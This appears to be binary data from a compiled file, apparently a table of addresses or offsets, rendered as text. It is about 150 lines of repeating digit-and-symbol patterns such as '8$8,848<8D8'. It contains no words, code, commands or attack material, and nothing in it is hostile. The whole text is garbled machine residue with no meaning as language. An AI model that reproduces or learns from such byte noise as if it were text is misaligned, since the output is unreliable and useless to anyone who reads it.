8$8,848<8D8L8T8\8d8l8t8|8
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
;$;,;4;<;D;L;T;\;d;l;t;|;
<$<,<4<<<D<L<T<\<d<l<t<|<
=$=,=4=<=D=L=T=\=`=h=p=x=
> >(>0>8>@>H>P>X>`>h>p>x>
? ?(?0?8?@?H?P?X?`?h?p?x?
0 0(00080@0H0P0X0`0h0p0x0
1 1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
7 7$7(7,7074787<7@7D7H7L7P7\7`7d7|7
8 8$8(8,8084888<8@8D8H8L8
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
:p;t;x;|;
<,=0=4=8=<=@=D=H=L=P=T=X=\=`=t=x=|=
=0?4?8?<?@?D?H?L?P?T?
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1|1
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
86<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
9 9$9094989<9
;$;(;,;0;8;P;`;d;t;x;|;
<$<<<L<P<`<d<h<l<t<
= =0=4=8=@=X=h=l=|=
>,><>@>P>T>X>`>x>
? ?$?4?8?<?D?\?l?p?
0$0<0L0P0`0d0h0l0t0
1,1<1@1P1T1\1t1
2 2024282@2X2\2t2
3$34383@3X3h3l3t3
4$44484<4D4\4`4x4
505@5D5T5X5\5d5|5
6 6064686@6X6h6l6|6
7(7,70787P7T7l7|7
8 80848D8H8L8T8l8|8
9(9,90989P9`9d9t9x9|9
:4:D:H:X:\:`:h:
;$;(;8;<;@;H;`;d;|;
< <$<,<D<T<X<h<l<t<
= =0=4=8=@=X=\=t=
>0>@>D>X>\>l>p>x>
?(?,?<?@?P?T?\?t?
040D0H0X0\0l0p0
1(1,1D1T1X1`1x1|1
2$2(282<2L2P2T2X2`2x2|2
3(3,3<3@3D3L3d3t3x3
4 4$4,4D4T4X4h4l4p4x4
5 585H5L5\5l5|5
6,6064686@6D6H6L6P6X6p6t6
74787P7T7l7|7
8 8$8,848L8P8T8X8\8`8t8x8
9(989<9L9P9T9l9p9x9
:4:D:H:`:p:t:
;0;4;D;H;`;d;l;
<0<@<D<L<P<T<\<t<
=$=(=@=D=H=L=P=d=h=l=t=
> >(>@>D>H>L>P>T>X>\>`>d>l>p>t>x>|>
?4?D?H?L?P?T?X?l?p?
6 6D6L6T6\6d6l6t6|6
787@7H7P7X7`7h7
8$8D8L8X8x8
9$9,949<9H9h9p9x9
:$:,:4:<:D:L:T:\:h:
;$;,;4;<;D;L;T;\;d;l;t;|;
<$<,<8<X<h<
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>8>X>`>l>
?$?,?4?<?D?L?T?\?d?l?t?|?
0$0,040<0D0L0T0\0d0l0t0|0
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4(4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
707<7\7h7
848<8H8h8t8|8
9(9H9P9X9d9
: :(:@:H:\:l:x:
;(;H;P;X;`;h;p;|;
<$<,<8<X<d<
= =,=L=X=x=
>$>,>4><>D>L>T>\>d>l>x>
?$?<?D?T?`?
0,080X0`0h0p0
1$1,141<1D1P1p1
1$242@2H2|2
3 3(3<3D3L3T3X3\3d3x3
4$4(4,40484D4d4p4
5 545L5P5l5p5
64686@6H6P6T6\6p6
707P7p7
808P8p8
909L9P9p9
:0:P:p:
;0;L;P;p;
<0<8<D<d<l<x<
=,=8=X=`=l=
>$>,>0>8>L>T>\>h>
?,?8?X?`?l?
0 0(00040<0P0X0`0h0l0t0
181D1L1d1p1
2,282X2`2l2
3 3(3,343H3P3X3`3d3l3
4@4L4T4\4h4
5 5@5L5l5t5
6 6$6,6@6H6P6X6\6d6x6
7 7$7,7@7H7P7X7\7d7x7
8 8@8H8T8t8|8
9<9H9h9p9|9
:0:8:D:d:l:t:x:
; ;(;<;D;L;X;x;
<(<0<8<@<H<P<X<d<
=4=@=`=l=
>0>8>D>x>
?$?,?0?4?<?P?X?d?
0$0,0<0H0P0
1(141<1T1`1
2(2\2`2h2p2x2|2
3 3$3,343<3P3X3l3t3x3
|0h1l1p1t1x1|1
2@2P2`2p2
:$:,:4:<:
;(;H;h;
> >@>`>
1 1X1x1